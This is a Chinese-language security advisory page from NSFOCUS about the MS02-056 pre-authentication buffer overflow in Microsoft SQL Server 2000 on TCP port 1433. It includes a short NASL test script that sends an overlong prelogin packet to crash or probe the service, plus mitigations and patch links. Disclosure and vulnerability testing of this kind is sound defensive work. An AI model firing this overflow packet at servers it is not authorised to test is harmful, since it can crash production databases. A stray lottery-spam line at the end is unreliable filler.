首頁 -> 安全研究

安全研究

安全漏洞
Microsoft SQL Server預驗證過程遠程緩沖區溢出漏洞(MS02-056)

發布日期:2002-08-06
更新日期:2002-10-09

受影響系統:
Microsoft SQL Server 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft SQL Server 2000 SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 5411
CVE(CAN) ID: CVE-2002-1123

Microsoft SQL Server是一款由Microsoft開發的大型數據庫系統。

Microsoft SQL Server在預驗證處理時存在漏洞,遠程攻擊者可以利用這個漏洞進行緩沖區溢出攻擊。

Microsoft SQL Server的預驗證過程存在問題,遠程攻擊者通過連接TCP 1433端口可以進行緩沖區溢出攻擊,由于問題發生在驗證之前,所以攻擊這無需驗證就可以進行攻擊,可能使攻擊者以SQL進程權限在系統上執行任意指令。


<*來源:Dave Aitel ([email protected]
  
  鏈接:http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
        http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

Dave Aitel ([email protected])提供了如下NASL腳本測試程序:

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);

desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);

script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        #uncomment this to see what normally happens
        #attack_string="MSSQLServer";
    #uncomment next line to actually test for overflow
    attack_string=crap(560);
        # this creates a variable called sql_packet
    sql_packet = pkt_hdr+attack_string+pkt_tail;
    send(socket:soc, data:sql_packet);

        r  = recv(socket:soc, length:4096);
        close(soc);
    display ("Result:",r,"\n");
       if(!r)
        {
         display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
        }
    }
}

建議:
臨時解決方法:

如果您不能立刻安裝補丁或者升級,NSFOCUS建議您采取以下措施以降低威脅:

* 在防火墻或者服務器上禁止不可信IP訪問SQL Server服務端口

廠商補?。?br />
Microsoft
---------
Microsoft已經為此發布了一個安全公告(MS02-056)以及相應補丁:
MS02-056:Cumulative Patch for SQL Server (Q316333)
鏈接:http://www.microsoft.com/technet/security/bulletin/MS02-056.asp

補丁下載:

     * Microsoft SQL Server 7.0:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q327068&sd=tech
     * Microsoft SQL Server 2000:
       http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316333&sd=tech

瀏覽次數:21111
嚴重程度:0(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
彩票网站哪个最正规